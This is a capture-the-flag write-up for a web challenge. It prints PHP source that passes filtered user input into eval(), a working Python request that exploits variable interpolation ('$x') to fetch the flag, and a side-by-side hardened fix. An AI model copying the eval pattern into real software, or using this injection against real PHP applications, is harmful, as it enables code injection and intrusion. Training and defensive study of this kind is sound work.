PeehPee
Easy
150
Are you able to access the secret area of Naruto ? I guess it's not that hard for you!
View the application source code via the `/?source` endpoint.

```python
from requests import get, post
url = 'https://blackhat4-1f84feb8cf11458ef1fb78a4cfea94f8-0.chals.bh.ctf.sa'
```

```php
<?php
//Show Page code source
if(isset($_GET["source"])){
    highlight_file(__FILE__);
}
// Juicy PHP Part
$flag=getenv("FLAG");
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if(isset($_POST["email"])&&isset($_POST["pass"])){
        if($_POST["email"]==="[email protected]"){
            $x=$_POST["test"];
            $inp=preg_replace("/[^A-Za-z0-9$]/","",$_POST["pass"]);
            if($inp==="SuperSecRetPassw0rd"){
                die("Hacking Attempt detected");
            }
            else{
                if(eval("return \$inp=\"$inp\";")==="SuperSecRetPassw0rd"){
                    echo $flag;
                }
                else{
                    die("Pretty Close maybe ?");
                }
            }
        }
    }
}
?>
```
From the source code, obtaining the flag depends on the following:

- The request method must be `POST`.
- The email parameter value must be `[email protected]`.
- The regex matches any single character not in `a-z`, `A-Z`, `0-9` or `$`, and `preg_replace` removes those characters from the pass parameter.
- The pass parameter value must not equal `SuperSecRetPassw0rd`.
- The `eval` function evaluates the pass parameter value.
- The test parameter value is stored in the `$x` variable.
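Since the pass parameter value is evaluated inside a double-quoted string and `$` survives the filter, sending `$x` as the pass value makes `eval` return the contents of the `$x` variable. The password `SuperSecRetPassw0rd` can therefore be supplied through the test parameter and returned after evaluation.

```python
import re

# Continues from the snippet above, which imports `post` and defines `url`.
data = { 'email': '[email protected]', 'test': 'SuperSecRetPassw0rd', 'pass': '$x' }
response = post(url, data = data)

# Pull the flag out of the response body.
html = response.text
flag = re.search(r'BlackHatMEA\{(.*)\}', html)
print(flag.group(0))
```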
BlackHatMEA{551:17:5d19f71744009b71e8809d46d3b65876dbb5adff}
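
The root cause next to a fix, as an added example that is not part of the original write-up or the challenge's code. The function names `check_vulnerable` and `check_hardened` are hypothetical, the inputs are constructed, and the hardened version assumes the intent is a plain secret comparison.

```php
<?php
// Added example: constructed for illustration, not the challenge's own code.
// check_vulnerable() and check_hardened() are hypothetical names.

const EXPECTED = 'SuperSecRetPassw0rd';

// The challenge logic as a function. The filter keeps '$', and the filtered
// value is spliced into PHP source, so "$x" is expanded when eval() runs.
function check_vulnerable(string $pass, string $test): bool
{
    $x = $test; // request-controlled variable in eval()'s scope
    $inp = preg_replace('/[^A-Za-z0-9$]/', '', $pass);
    if ($inp === EXPECTED) {
        return false; // "Hacking Attempt detected" branch
    }
    return eval("return \$inp=\"$inp\";") === EXPECTED;
}

// Hardened: the input stays data. No eval(), no interpolation, and a
// constant-time comparison. Assumes the goal is a plain secret check.
function check_hardened(string $pass): bool
{
    return hash_equals(EXPECTED, $pass);
}

// Constructed inputs: the request from this write-up, then a wrong guess.
$cases = [
    ['pass' => '$x',    'test' => EXPECTED],
    ['pass' => 'wrong', 'test' => ''],
];

foreach ($cases as $c) {
    printf(
        "pass=%-5s vulnerable=%s hardened=%s\n",
        $c['pass'],
        var_export(check_vulnerable($c['pass'], $c['test']), true),
        var_export(check_hardened($c['pass']), true)
    );
}
```

In a real application the secret would be stored as a hash and checked with `password_verify` rather than compared against a constant.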